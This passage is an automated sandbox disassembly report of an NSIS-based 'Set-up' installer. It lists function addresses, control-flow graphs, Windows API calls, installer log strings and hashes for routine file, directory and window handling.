                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                    • String ID: New install of "%s" to "%s"${
                                                                    • API String ID: 2110491804-1641061399
                                                                    • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                    • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                    • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                    • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                    Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                    APIs
                                                                    • #17.COMCTL32 ref: 004038CE
                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                    • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                    • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                    • API String ID: 2435955865-3712954417
                                                                    • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                    • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                    • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                    • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                    Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: jF
                                                                    • API String ID: 2295610775-3349280890
                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                    Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                    • String ID:
                                                                    • API String ID: 310444273-0
                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                    Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                    APIs
                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                    Strings
                                                                    • Call: %d, xrefs: 0040165A
                                                                    • BringToFront, xrefs: 004016BD
                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                    • Jump: %d, xrefs: 00401602
                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                    • detailprint: %s, xrefs: 00401679
                                                                    • Rename: %s, xrefs: 004018F8
                                                                    • Sleep(%d), xrefs: 0040169D
                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                    • API String ID: 2872004960-3619442763
                                                                    • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                    • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                    • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                    • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                    Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                    • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                    • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID:
                                                                    • API String ID: 3282139019-0
                                                                    • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                    • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                    Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                    APIs
                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
